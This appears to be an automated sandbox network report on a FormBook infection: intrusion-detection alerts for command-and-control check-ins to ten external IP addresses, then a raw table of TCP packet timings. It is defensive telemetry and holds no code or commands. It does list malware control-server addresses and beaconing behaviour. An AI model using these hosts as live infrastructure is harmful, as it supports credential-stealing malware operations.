                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-09-12T13:02:39.719355+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54971147.57.185.22780TCP
                    2024-09-12T13:03:03.101506+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54971689.58.49.180TCP
                    2024-09-12T13:03:24.935270+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549721154.23.184.24080TCP
                    2024-09-12T13:03:38.544416+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54972585.159.66.9380TCP
                    2024-09-12T13:03:51.946841+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549729185.173.111.7680TCP
                    2024-09-12T13:04:05.250629+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549733203.161.43.22880TCP
                    2024-09-12T13:04:18.731382+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549737161.97.168.24580TCP
                    2024-09-12T13:04:32.719913+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549741172.96.191.3980TCP
                    2024-09-12T13:04:46.013073+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549745104.21.20.12580TCP
                    2024-09-12T13:05:00.602958+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54974943.242.202.16980TCP

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Sep 12, 2024 13:02:38.818775892 CEST4971180192.168.2.547.57.185.227
                    Sep 12, 2024 13:02:38.824676037 CEST804971147.57.185.227192.168.2.5
                    Sep 12, 2024 13:02:38.824815989 CEST4971180192.168.2.547.57.185.227
                    Sep 12, 2024 13:02:38.835670948 CEST4971180192.168.2.547.57.185.227
                    Sep 12, 2024 13:02:38.840663910 CEST804971147.57.185.227192.168.2.5
                    Sep 12, 2024 13:02:39.719141960 CEST804971147.57.185.227192.168.2.5
                    Sep 12, 2024 13:02:39.719166994 CEST804971147.57.185.227192.168.2.5
                    Sep 12, 2024 13:02:39.719355106 CEST4971180192.168.2.547.57.185.227
                    Sep 12, 2024 13:02:39.723777056 CEST4971180192.168.2.547.57.185.227
                    Sep 12, 2024 13:02:39.728601933 CEST804971147.57.185.227192.168.2.5
                    Sep 12, 2024 13:02:54.818814993 CEST4971280192.168.2.589.58.49.1
                    Sep 12, 2024 13:02:54.824268103 CEST804971289.58.49.1192.168.2.5
                    Sep 12, 2024 13:02:54.824373960 CEST4971280192.168.2.589.58.49.1
                    Sep 12, 2024 13:02:54.834352970 CEST4971280192.168.2.589.58.49.1
                    Sep 12, 2024 13:02:54.840778112 CEST804971289.58.49.1192.168.2.5
                    Sep 12, 2024 13:02:55.453418970 CEST804971289.58.49.1192.168.2.5
                    Sep 12, 2024 13:02:55.453618050 CEST804971289.58.49.1192.168.2.5
                    Sep 12, 2024 13:02:55.453707933 CEST4971280192.168.2.589.58.49.1
                    Sep 12, 2024 13:02:56.340054989 CEST4971280192.168.2.589.58.49.1
                    Sep 12, 2024 13:02:57.358364105 CEST4971480192.168.2.589.58.49.1
                    Sep 12, 2024 13:02:57.363325119 CEST804971489.58.49.1192.168.2.5
                    Sep 12, 2024 13:02:57.363399982 CEST4971480192.168.2.589.58.49.1
                    Sep 12, 2024 13:02:57.372428894 CEST4971480192.168.2.589.58.49.1
                    Sep 12, 2024 13:02:57.377290964 CEST804971489.58.49.1192.168.2.5
                    Sep 12, 2024 13:02:58.013906002 CEST804971489.58.49.1192.168.2.5
                    Sep 12, 2024 13:02:58.014209032 CEST804971489.58.49.1192.168.2.5
                    Sep 12, 2024 13:02:58.014271975 CEST4971480192.168.2.589.58.49.1
                    Sep 12, 2024 13:02:58.886881113 CEST4971480192.168.2.589.58.49.1
                    Sep 12, 2024 13:02:59.905208111 CEST4971580192.168.2.589.58.49.1
                    Sep 12, 2024 13:02:59.911024094 CEST804971589.58.49.1192.168.2.5
                    Sep 12, 2024 13:02:59.911142111 CEST4971580192.168.2.589.58.49.1
                    Sep 12, 2024 13:02:59.938705921 CEST4971580192.168.2.589.58.49.1
                    Sep 12, 2024 13:03:00.148649931 CEST804971589.58.49.1192.168.2.5
                    Sep 12, 2024 13:03:00.148899078 CEST804971589.58.49.1192.168.2.5
                    Sep 12, 2024 13:03:00.542438984 CEST804971589.58.49.1192.168.2.5
                    Sep 12, 2024 13:03:00.542470932 CEST804971589.58.49.1192.168.2.5
                    Sep 12, 2024 13:03:00.542582035 CEST4971580192.168.2.589.58.49.1
                    Sep 12, 2024 13:03:01.450923920 CEST4971580192.168.2.589.58.49.1
                    Sep 12, 2024 13:03:02.469186068 CEST4971680192.168.2.589.58.49.1
                    Sep 12, 2024 13:03:02.474258900 CEST804971689.58.49.1192.168.2.5
                    Sep 12, 2024 13:03:02.474365950 CEST4971680192.168.2.589.58.49.1
                    Sep 12, 2024 13:03:02.483143091 CEST4971680192.168.2.589.58.49.1
                    Sep 12, 2024 13:03:02.487998962 CEST804971689.58.49.1192.168.2.5
                    Sep 12, 2024 13:03:03.101243019 CEST804971689.58.49.1192.168.2.5
                    Sep 12, 2024 13:03:03.101258039 CEST804971689.58.49.1192.168.2.5
                    Sep 12, 2024 13:03:03.101505995 CEST4971680192.168.2.589.58.49.1
                    Sep 12, 2024 13:03:03.104060888 CEST4971680192.168.2.589.58.49.1
                    Sep 12, 2024 13:03:03.108933926 CEST804971689.58.49.1192.168.2.5
                    Sep 12, 2024 13:03:16.355132103 CEST4971780192.168.2.5154.23.184.240
                    Sep 12, 2024 13:03:16.360095024 CEST8049717154.23.184.240192.168.2.5
                    Sep 12, 2024 13:03:16.360275030 CEST4971780192.168.2.5154.23.184.240
                    Sep 12, 2024 13:03:16.373815060 CEST4971780192.168.2.5154.23.184.240
                    Sep 12, 2024 13:03:16.378916025 CEST8049717154.23.184.240192.168.2.5
                    Sep 12, 2024 13:03:17.267894983 CEST8049717154.23.184.240192.168.2.5
                    Sep 12, 2024 13:03:17.268049955 CEST8049717154.23.184.240192.168.2.5
                    Sep 12, 2024 13:03:17.268132925 CEST4971780192.168.2.5154.23.184.240
                    Sep 12, 2024 13:03:17.887042999 CEST4971780192.168.2.5154.23.184.240
                    Sep 12, 2024 13:03:18.905615091 CEST4971880192.168.2.5154.23.184.240
                    Sep 12, 2024 13:03:18.910422087 CEST8049718154.23.184.240192.168.2.5
                    Sep 12, 2024 13:03:18.910656929 CEST4971880192.168.2.5154.23.184.240
                    Sep 12, 2024 13:03:18.921433926 CEST4971880192.168.2.5154.23.184.240
                    Sep 12, 2024 13:03:18.926388025 CEST8049718154.23.184.240192.168.2.5
                    Sep 12, 2024 13:03:19.821716070 CEST8049718154.23.184.240192.168.2.5
                    Sep 12, 2024 13:03:19.821805954 CEST8049718154.23.184.240192.168.2.5
                    Sep 12, 2024 13:03:19.821860075 CEST4971880192.168.2.5154.23.184.240
                    Sep 12, 2024 13:03:20.433780909 CEST4971880192.168.2.5154.23.184.240
                    Sep 12, 2024 13:03:21.451855898 CEST4972080192.168.2.5154.23.184.240
                    Sep 12, 2024 13:03:21.456955910 CEST8049720154.23.184.240192.168.2.5
                    Sep 12, 2024 13:03:21.457055092 CEST4972080192.168.2.5154.23.184.240
                    Sep 12, 2024 13:03:21.465765953 CEST4972080192.168.2.5154.23.184.240
                    Sep 12, 2024 13:03:21.470658064 CEST8049720154.23.184.240192.168.2.5
                    Sep 12, 2024 13:03:21.470850945 CEST8049720154.23.184.240192.168.2.5
                    Sep 12, 2024 13:03:22.355307102 CEST8049720154.23.184.240192.168.2.5
                    Sep 12, 2024 13:03:22.355482101 CEST8049720154.23.184.240192.168.2.5
                    Sep 12, 2024 13:03:22.355571985 CEST4972080192.168.2.5154.23.184.240
                    Sep 12, 2024 13:03:22.980650902 CEST4972080192.168.2.5154.23.184.240
                    Sep 12, 2024 13:03:24.000660896 CEST4972180192.168.2.5154.23.184.240
                    Sep 12, 2024 13:03:24.006323099 CEST8049721154.23.184.240192.168.2.5
                    Sep 12, 2024 13:03:24.006453991 CEST4972180192.168.2.5154.23.184.240
                    Sep 12, 2024 13:03:24.016140938 CEST4972180192.168.2.5154.23.184.240
                    Sep 12, 2024 13:03:24.021162033 CEST8049721154.23.184.240192.168.2.5
                    Sep 12, 2024 13:03:24.935090065 CEST8049721154.23.184.240192.168.2.5
                    Sep 12, 2024 13:03:24.935128927 CEST8049721154.23.184.240192.168.2.5
                    Sep 12, 2024 13:03:24.935139894 CEST8049721154.23.184.240192.168.2.5
                    Sep 12, 2024 13:03:24.935270071 CEST4972180192.168.2.5154.23.184.240
                    Sep 12, 2024 13:03:24.938061953 CEST4972180192.168.2.5154.23.184.240
                    Sep 12, 2024 13:03:24.943053007 CEST8049721154.23.184.240192.168.2.5
                    Sep 12, 2024 13:03:30.166282892 CEST4972280192.168.2.585.159.66.93
                    Sep 12, 2024 13:03:30.171295881 CEST804972285.159.66.93192.168.2.5
                    Sep 12, 2024 13:03:30.171372890 CEST4972280192.168.2.585.159.66.93
                    Sep 12, 2024 13:03:30.182279110 CEST4972280192.168.2.585.159.66.93
                    Sep 12, 2024 13:03:30.187098026 CEST804972285.159.66.93192.168.2.5
                    Sep 12, 2024 13:03:31.686193943 CEST4972280192.168.2.585.159.66.93
                    Sep 12, 2024 13:03:31.691543102 CEST804972285.159.66.93192.168.2.5
                    Sep 12, 2024 13:03:31.694250107 CEST4972280192.168.2.585.159.66.93
                    Sep 12, 2024 13:03:32.702420950 CEST4972380192.168.2.585.159.66.93
                    Sep 12, 2024 13:03:32.707307100 CEST804972385.159.66.93192.168.2.5
                    Sep 12, 2024 13:03:32.707386971 CEST4972380192.168.2.585.159.66.93
                    Sep 12, 2024 13:03:32.717885971 CEST4972380192.168.2.585.159.66.93
                    Sep 12, 2024 13:03:32.722722054 CEST804972385.159.66.93192.168.2.5
                    Sep 12, 2024 13:03:34.257181883 CEST4972380192.168.2.585.159.66.93
                    Sep 12, 2024 13:03:34.262511015 CEST804972385.159.66.93192.168.2.5
                    Sep 12, 2024 13:03:34.262645006 CEST4972380192.168.2.585.159.66.93
                    Sep 12, 2024 13:03:35.268716097 CEST4972480192.168.2.585.159.66.93
                    Sep 12, 2024 13:03:35.273634911 CEST804972485.159.66.93192.168.2.5
                    Sep 12, 2024 13:03:35.274189949 CEST4972480192.168.2.585.159.66.93
                    Sep 12, 2024 13:03:35.282720089 CEST4972480192.168.2.585.159.66.93
                    Sep 12, 2024 13:03:35.287755966 CEST804972485.159.66.93192.168.2.5
                    Sep 12, 2024 13:03:35.287911892 CEST804972485.159.66.93192.168.2.5
                    Sep 12, 2024 13:03:36.793287992 CEST4972480192.168.2.585.159.66.93
                    Sep 12, 2024 13:03:36.799228907 CEST804972485.159.66.93192.168.2.5
                    Sep 12, 2024 13:03:36.799410105 CEST4972480192.168.2.585.159.66.93
                    Sep 12, 2024 13:03:37.812872887 CEST4972580192.168.2.585.159.66.93
                    Sep 12, 2024 13:03:37.817758083 CEST804972585.159.66.93192.168.2.5
                    Sep 12, 2024 13:03:37.820497990 CEST4972580192.168.2.585.159.66.93
                    Sep 12, 2024 13:03:37.832906961 CEST4972580192.168.2.585.159.66.93
                    Sep 12, 2024 13:03:37.837788105 CEST804972585.159.66.93192.168.2.5
                    Sep 12, 2024 13:03:38.543889999 CEST804972585.159.66.93192.168.2.5
                    Sep 12, 2024 13:03:38.544334888 CEST804972585.159.66.93192.168.2.5
                    Sep 12, 2024 13:03:38.544415951 CEST4972580192.168.2.585.159.66.93
                    Sep 12, 2024 13:03:38.547233105 CEST4972580192.168.2.585.159.66.93
                    Sep 12, 2024 13:03:38.552057028 CEST804972585.159.66.93192.168.2.5
                    Sep 12, 2024 13:03:43.624932051 CEST4972680192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:43.629817963 CEST8049726185.173.111.76192.168.2.5
                    Sep 12, 2024 13:03:43.633142948 CEST4972680192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:43.645375013 CEST4972680192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:43.650194883 CEST8049726185.173.111.76192.168.2.5
                    Sep 12, 2024 13:03:44.312072992 CEST8049726185.173.111.76192.168.2.5
                    Sep 12, 2024 13:03:44.314317942 CEST8049726185.173.111.76192.168.2.5
                    Sep 12, 2024 13:03:44.314393997 CEST4972680192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:45.152618885 CEST4972680192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:46.172337055 CEST4972780192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:46.177232981 CEST8049727185.173.111.76192.168.2.5
                    Sep 12, 2024 13:03:46.177337885 CEST4972780192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:46.190018892 CEST4972780192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:46.194880962 CEST8049727185.173.111.76192.168.2.5
                    Sep 12, 2024 13:03:46.957264900 CEST8049727185.173.111.76192.168.2.5
                    Sep 12, 2024 13:03:46.957282066 CEST8049727185.173.111.76192.168.2.5
                    Sep 12, 2024 13:03:46.957402945 CEST4972780192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:46.990291119 CEST8049727185.173.111.76192.168.2.5
                    Sep 12, 2024 13:03:46.993252039 CEST4972780192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:47.699464083 CEST4972780192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:48.718987942 CEST4972880192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:48.723819017 CEST8049728185.173.111.76192.168.2.5
                    Sep 12, 2024 13:03:48.723901033 CEST4972880192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:48.736520052 CEST4972880192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:48.741379976 CEST8049728185.173.111.76192.168.2.5
                    Sep 12, 2024 13:03:48.741504908 CEST8049728185.173.111.76192.168.2.5
                    Sep 12, 2024 13:03:49.398442030 CEST8049728185.173.111.76192.168.2.5
                    Sep 12, 2024 13:03:49.398500919 CEST8049728185.173.111.76192.168.2.5
                    Sep 12, 2024 13:03:49.398567915 CEST4972880192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:50.246330976 CEST4972880192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:51.265717030 CEST4972980192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:51.270714998 CEST8049729185.173.111.76192.168.2.5
                    Sep 12, 2024 13:03:51.270895004 CEST4972980192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:51.278351068 CEST4972980192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:51.283245087 CEST8049729185.173.111.76192.168.2.5
                    Sep 12, 2024 13:03:51.946367979 CEST8049729185.173.111.76192.168.2.5
                    Sep 12, 2024 13:03:51.946489096 CEST8049729185.173.111.76192.168.2.5
                    Sep 12, 2024 13:03:51.946841002 CEST4972980192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:51.949317932 CEST4972980192.168.2.5185.173.111.76
                    Sep 12, 2024 13:03:51.954159975 CEST8049729185.173.111.76192.168.2.5
                    Sep 12, 2024 13:03:56.998389959 CEST4973080192.168.2.5203.161.43.228
                    Sep 12, 2024 13:03:57.004360914 CEST8049730203.161.43.228192.168.2.5
                    Sep 12, 2024 13:03:57.006300926 CEST4973080192.168.2.5203.161.43.228
                    Sep 12, 2024 13:03:57.018244028 CEST4973080192.168.2.5203.161.43.228
                    Sep 12, 2024 13:03:57.023152113 CEST8049730203.161.43.228192.168.2.5
                    Sep 12, 2024 13:03:57.620933056 CEST8049730203.161.43.228192.168.2.5
                    Sep 12, 2024 13:03:57.621165037 CEST8049730203.161.43.228192.168.2.5
                    Sep 12, 2024 13:03:57.621227026 CEST4973080192.168.2.5203.161.43.228
                    Sep 12, 2024 13:03:58.527559042 CEST4973080192.168.2.5203.161.43.228
                    Sep 12, 2024 13:03:59.548232079 CEST4973180192.168.2.5203.161.43.228
                    Sep 12, 2024 13:03:59.553128004 CEST8049731203.161.43.228192.168.2.5
                    Sep 12, 2024 13:03:59.557405949 CEST4973180192.168.2.5203.161.43.228
                    Sep 12, 2024 13:03:59.568510056 CEST4973180192.168.2.5203.161.43.228
                    Sep 12, 2024 13:03:59.573326111 CEST8049731203.161.43.228192.168.2.5
                    Sep 12, 2024 13:04:00.150923014 CEST8049731203.161.43.228192.168.2.5
                    Sep 12, 2024 13:04:00.150995970 CEST8049731203.161.43.228192.168.2.5
                    Sep 12, 2024 13:04:00.151040077 CEST4973180192.168.2.5203.161.43.228
                    Sep 12, 2024 13:04:01.077178955 CEST4973180192.168.2.5203.161.43.228
                    Sep 12, 2024 13:04:02.094069958 CEST4973280192.168.2.5203.161.43.228
                    Sep 12, 2024 13:04:02.099900007 CEST8049732203.161.43.228192.168.2.5
                    Sep 12, 2024 13:04:02.099977970 CEST4973280192.168.2.5203.161.43.228
                    Sep 12, 2024 13:04:02.111869097 CEST4973280192.168.2.5203.161.43.228
                    Sep 12, 2024 13:04:02.117511034 CEST8049732203.161.43.228192.168.2.5
                    Sep 12, 2024 13:04:02.117561102 CEST8049732203.161.43.228192.168.2.5
                    Sep 12, 2024 13:04:02.708224058 CEST8049732203.161.43.228192.168.2.5
                    Sep 12, 2024 13:04:02.709275961 CEST8049732203.161.43.228192.168.2.5
                    Sep 12, 2024 13:04:02.709330082 CEST4973280192.168.2.5203.161.43.228
                    Sep 12, 2024 13:04:03.622237921 CEST4973280192.168.2.5203.161.43.228
                    Sep 12, 2024 13:04:04.640292883 CEST4973380192.168.2.5203.161.43.228
                    Sep 12, 2024 13:04:04.645531893 CEST8049733203.161.43.228192.168.2.5
                    Sep 12, 2024 13:04:04.645657063 CEST4973380192.168.2.5203.161.43.228
                    Sep 12, 2024 13:04:04.653492928 CEST4973380192.168.2.5203.161.43.228
                    Sep 12, 2024 13:04:04.658451080 CEST8049733203.161.43.228192.168.2.5
                    Sep 12, 2024 13:04:05.250320911 CEST8049733203.161.43.228192.168.2.5
                    Sep 12, 2024 13:04:05.250451088 CEST8049733203.161.43.228192.168.2.5
                    Sep 12, 2024 13:04:05.250628948 CEST4973380192.168.2.5203.161.43.228
                    Sep 12, 2024 13:04:05.253101110 CEST4973380192.168.2.5203.161.43.228
                    Sep 12, 2024 13:04:05.258152008 CEST8049733203.161.43.228192.168.2.5
                    Sep 12, 2024 13:04:10.469955921 CEST4973480192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:10.474829912 CEST8049734161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:10.474924088 CEST4973480192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:10.488035917 CEST4973480192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:10.492902040 CEST8049734161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:11.080820084 CEST8049734161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:11.080848932 CEST8049734161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:11.081099987 CEST8049734161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:11.081285954 CEST4973480192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:11.996397018 CEST4973480192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:13.015813112 CEST4973580192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:13.021023989 CEST8049735161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:13.022452116 CEST4973580192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:13.034251928 CEST4973580192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:13.041433096 CEST8049735161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:14.479947090 CEST8049735161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:14.480197906 CEST8049735161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:14.480211020 CEST8049735161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:14.480218887 CEST8049735161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:14.480257034 CEST4973580192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:14.480289936 CEST4973580192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:14.480438948 CEST8049735161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:14.480478048 CEST4973580192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:14.481065989 CEST8049735161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:14.481117010 CEST4973580192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:14.543389082 CEST4973580192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:15.561973095 CEST4973680192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:15.566998005 CEST8049736161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:15.567142963 CEST4973680192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:15.577953100 CEST4973680192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:15.583339930 CEST8049736161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:15.583796024 CEST8049736161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:16.180771112 CEST8049736161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:16.180789948 CEST8049736161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:16.180844069 CEST4973680192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:16.181133986 CEST8049736161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:16.181179047 CEST4973680192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:17.092839956 CEST4973680192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:18.109293938 CEST4973780192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:18.114465952 CEST8049737161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:18.114547968 CEST4973780192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:18.122958899 CEST4973780192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:18.127893925 CEST8049737161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:18.731256008 CEST8049737161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:18.731272936 CEST8049737161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:18.731286049 CEST8049737161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:18.731381893 CEST4973780192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:18.731554985 CEST8049737161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:18.731606007 CEST4973780192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:18.735177040 CEST4973780192.168.2.5161.97.168.245
                    Sep 12, 2024 13:04:18.740600109 CEST8049737161.97.168.245192.168.2.5
                    Sep 12, 2024 13:04:24.022284031 CEST4973880192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:24.027842999 CEST8049738172.96.191.39192.168.2.5
                    Sep 12, 2024 13:04:24.027951956 CEST4973880192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:24.039851904 CEST4973880192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:24.044756889 CEST8049738172.96.191.39192.168.2.5
                    Sep 12, 2024 13:04:24.947698116 CEST8049738172.96.191.39192.168.2.5
                    Sep 12, 2024 13:04:24.947745085 CEST8049738172.96.191.39192.168.2.5
                    Sep 12, 2024 13:04:24.947798967 CEST4973880192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:25.546982050 CEST4973880192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:26.562716961 CEST4973980192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:26.685844898 CEST8049739172.96.191.39192.168.2.5
                    Sep 12, 2024 13:04:26.686022043 CEST4973980192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:26.696578979 CEST4973980192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:26.701644897 CEST8049739172.96.191.39192.168.2.5
                    Sep 12, 2024 13:04:27.810235023 CEST8049739172.96.191.39192.168.2.5
                    Sep 12, 2024 13:04:27.810328007 CEST8049739172.96.191.39192.168.2.5
                    Sep 12, 2024 13:04:27.810359001 CEST8049739172.96.191.39192.168.2.5
                    Sep 12, 2024 13:04:27.810437918 CEST4973980192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:27.810437918 CEST4973980192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:28.199446917 CEST4973980192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:29.218466043 CEST4974080192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:29.223588943 CEST8049740172.96.191.39192.168.2.5
                    Sep 12, 2024 13:04:29.223723888 CEST4974080192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:29.234381914 CEST4974080192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:29.239433050 CEST8049740172.96.191.39192.168.2.5
                    Sep 12, 2024 13:04:29.239460945 CEST8049740172.96.191.39192.168.2.5
                    Sep 12, 2024 13:04:30.122452974 CEST8049740172.96.191.39192.168.2.5
                    Sep 12, 2024 13:04:30.122781992 CEST8049740172.96.191.39192.168.2.5
                    Sep 12, 2024 13:04:30.122857094 CEST4974080192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:30.746407986 CEST4974080192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:31.768755913 CEST4974180192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:31.773775101 CEST8049741172.96.191.39192.168.2.5
                    Sep 12, 2024 13:04:31.777596951 CEST4974180192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:31.784569979 CEST4974180192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:31.789469957 CEST8049741172.96.191.39192.168.2.5
                    Sep 12, 2024 13:04:32.719666004 CEST8049741172.96.191.39192.168.2.5
                    Sep 12, 2024 13:04:32.719851017 CEST8049741172.96.191.39192.168.2.5
                    Sep 12, 2024 13:04:32.719913006 CEST4974180192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:32.722703934 CEST4974180192.168.2.5172.96.191.39
                    Sep 12, 2024 13:04:32.727658033 CEST8049741172.96.191.39192.168.2.5
                    Sep 12, 2024 13:04:37.764853001 CEST4974280192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:37.769819975 CEST8049742104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:37.774447918 CEST4974280192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:37.786297083 CEST4974280192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:37.791229010 CEST8049742104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:38.374731064 CEST8049742104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:38.374779940 CEST8049742104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:38.374835014 CEST4974280192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:38.375209093 CEST8049742104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:38.375272036 CEST4974280192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:39.294302940 CEST4974280192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:40.312376022 CEST4974380192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:40.317338943 CEST8049743104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:40.317462921 CEST4974380192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:40.330420017 CEST4974380192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:40.335489988 CEST8049743104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:40.895057917 CEST8049743104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:40.896543026 CEST8049743104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:40.896594048 CEST4974380192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:40.896821976 CEST8049743104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:40.896868944 CEST4974380192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:41.840377092 CEST4974380192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:42.858992100 CEST4974480192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:42.864027023 CEST8049744104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:42.864134073 CEST4974480192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:42.874250889 CEST4974480192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:42.879446983 CEST8049744104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:42.879582882 CEST8049744104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:43.482140064 CEST8049744104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:43.482203007 CEST8049744104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:43.482386112 CEST4974480192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:43.482933044 CEST8049744104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:43.483227015 CEST8049744104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:43.483489037 CEST4974480192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:44.387451887 CEST4974480192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:45.406213999 CEST4974580192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:45.412832022 CEST8049745104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:45.412960052 CEST4974580192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:45.422066927 CEST4974580192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:45.427263975 CEST8049745104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:46.012533903 CEST8049745104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:46.012829065 CEST8049745104.21.20.125192.168.2.5
